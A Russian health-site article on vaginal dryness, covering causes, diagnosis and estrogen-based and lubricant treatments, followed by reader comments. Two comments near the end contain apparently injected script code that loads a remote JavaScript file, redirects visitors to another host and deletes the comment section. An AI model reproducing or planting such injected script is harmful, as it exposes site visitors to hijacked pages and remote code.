Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сухость во влагалище. Как...  >>  Сухость во влагалище. Как дальше жить?
 
Обратная связь
 

Сухость во влагалище. Как дальше жить?

Размер шрифта
04 октября 2013 00:00
  • google_analytics: false
  • Нравится

Сухость влагалища является одним из симптомов менопаузы. В нашей статье мы расскажем о причинах сухости влагалища и методах устранения этого неприятного симптома.

Сухость во влагалище. Как дальше жить?

Во время менопаузы выработка эстрогена постепенно уменьшается, а затем полностью прекращается. Этот процесс сопровождается определенными физиологическими изменениями в организме женщины. Менструации становятся нерегулярными, появляются приливы, перепады настроения, голос становится более низким, увеличивается количество волос на лице. Еще один симптом менопаузы – сухость влагалища – встречается у каждой третьей женщины. Следует отметить, что сухость влагалища может возникнуть в любом возрасте и по разным причинам. Она значительно ухудшает качество сексуальной жизни, но, к счастью, поддается лечению.

Причины

В норме стенки влагалища покрыты тонким слоем слизи. За увлажнение и эластичность слизистой оболочки влагалища отвечает женский половой гормон эстроген. Во время менопаузы количество эстрогена уменьшается, что ведет к уменьшению количества слизи. Слизистая оболочка влагалища истончается и становится менее эластичной. Такое состояние носит название «атрофия влагалища».

Уровень эстрогена уменьшается не только во время менопаузы, но и при:

  • беременности и кормлении грудью,
  • лучевой терапии или химиотерапии по поводу рака,
  • хирургическом удалении яичников,
  • приеме антиэстрогенных препаратов, которые используются для лечения миомы матки и эндометриоза.

К другим причинам сухости влагалища относится:

  • синдром Шегрена (аутоиммунное заболевание с вовлечением в патологический процесс желез внешней секреции),
  • аллергия, лекарства против простуды, некоторые антидепрессанты,
  • спринцевание,
  • короткая прелюдия перед половым актом.

Вне зависимости от причины, сухость влагалища штука весьма неприятная. Она может сопровождаться зудом, жжением и болью при половом акте.

Диагностика

При появлении жжения, зуда или дискомфорта в области влагалища необходимо обратиться к гинекологу, который сможет установить причину неприятных ощущений. Для этого необходимо провести гинекологический осмотр, исключить инфекции мочевыводящих путей и взять мазок Папаниколау, который позволяет выявить наличие предраковых или раковых клеток.

Лечение

Для лечения сухости влагалища, обусловленной низким уровнем эстрогена, используются препараты для местного применения. Эти препараты позволяют устранить местные симптомы, но не всасываются в кровь.

К препаратам для местного применения относятся:

  • Вагинальное кольцо вводится во влагалище и постоянно выделят эстроген в окружающие ткани. Кольцо нужно менять каждые три месяца.
  • Вагинальная таблетка вводится во влагалище и находится там в течение первых двух недель. Затем таблетки вставляются два раза в неделю.
  • Вагинальный крем вводится во влагалище с помощью аппликатора. Кратность использования крема зависит от конкретного препарата.

Однако любые препараты эстрогена не лишены побочных эффектов, таких как кровотечение из влагалища и боль в молочных железах. Средства для местного применения не рекомендуется использовать при:

  • Раке молочных желез, особенно при использовании ингибиторов ароматазы.
  • Раке эндометрия в анамнезе.
  • Вагинальном кровотечении в анамнезе, причина которого не установлена.
  • Беременности и кормлении грудью.

Для дополнительного увлажнения влагалища можно использовать лубриканты. Именно они и длительная прелюдия являются залогом полноценного полового акта. Забудьте о спринцевании, не принимайте ванну и не пользуйтесь ароматизированным мылом и лосьонами – все это усиливает сухость влагалища.

Все, что вы хотели знать о влагалище, но боялись спросить – в нашем специальном проекте «Вся правда о влагалище».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

04 октября 2013 в 23:06

Комментарий удален за нарушение Правил общения

2 - Гость

09 октября 2014 в 20:13

Цитировать   |   Пожаловаться

По всему интернету одно и тоже, а названия вагинального кольца с эстрогеном ни где нет.

3 - Гость

10 октября 2014 в 01:25

Цитировать   |   Пожаловаться

Спасбо за хорошую статью

4 - Гость

10 октября 2014 в 01:33

Цитировать   |   Пожаловаться

Мне не так давно удалили миому и начались проблемы при половом акте. После каждого полового акта начинался цистит, да и дискомфорт при половом акте. Пошла к врачу, она мне объяснила, что у меня после операции смазка стала выделяться хуже  и что такое на самом деле бывает и что со временем все должно восстановиться. А пока не восстановилось посоветовала пользоваться гелем. Так и на самом деле благодаря ему половой акт не мучение, а как и раньше приятное удовольствие и цистит меня не мучает после полового акта.

5 - Гость

26 октября 2014 в 09:42

Цитировать   |   Пожаловаться

У нас проблема в виде сухости появилась, когда я грудью кормила. Самое интересное, что и время было ( ребенок спал ночами хорошо, прям на удивление) и желание, а там – сухо. L Спаслись монтавит гелем. Замечательная штука, без всякого там запаха и прочего. А потом кормить перестала и проблема ушла сама собой.

6 - Гость

15 ноября 2014 в 07:38

Цитировать   |   Пожаловаться

Помню как то давно у меня при ПА возникала сухость во влагалище, но как то само по себе прошло. А вот последнюю неделю прям совсем невозможно совершать половой акт, сухо там и все, не пойму в чем причина и не знаю чего делать. Вот читаю статьи, ищу ответ, аж страшно становится.

7 - Гость

18 ноября 2014 в 09:44

Цитировать   |   Пожаловаться

Я с болячками долго стараюсь не затягивать, просто знаю к каким они иногда последствиям приводят. С сухостью влагалища у меня тоже помню были проблемы правда года два назад. Одно время навалилось куча проблем и дома и на работе, были частые стрессы и на фоне их все и случилось. При половом акте естественной смазки совсем не было, при проникновении было ужасно больно и начиналось жжение. Хорошо  у меня есть знакомый гинеколог, который порекомендовал мне гель заменяющий естественный секрет влагалища. Благодаря гелю секс стал намного комфортней. Пользовалась им пока постепенно все не  восстановилось.

8 - Кармелита

08 декабря 2014 в 16:00

Цитировать   |   Пожаловаться

Гость 15 ноября 2014 в 07:38
Помню как то давно у меня при ПА возникала сухость во влагалище, но как то само по себе прошло. А вот последнюю неделю прям совсем невозможно совершать половой акт, сухо там и все, не пойму в чем причина и не знаю чего делать. Вот читаю статьи, ищу ответ, аж страшно становится.
 Надо идти к врачу и с ним советоваться. Причины могут быть разные - может и гормональный сбой быть, может от таблеток каких. У меня от противозачаточных (гормональных) сухость появилась. Перестала их принимать - все прошло. Иногда бывает сухо на фоне стресса. Но мне тогда ещё врач на приеме порекомендовала гель использовать для увлажнения при интимной близости. Он мне действительно помог и помогает и близость уже не как пытка воспринимается и приносит удовольствие.

9 - zzzzzz

30 июня 2015 в 19:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

10 - zzzzzz

30 июня 2015 в 23:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

1 | 2 Следующая

Статьи

       
Эндометриоз связан с двумя пестицидами   Простые ежедневные прогулки уменьшают риск рака груди   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Признаки рака, которые игнорируют женщины
Цвета против рака
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.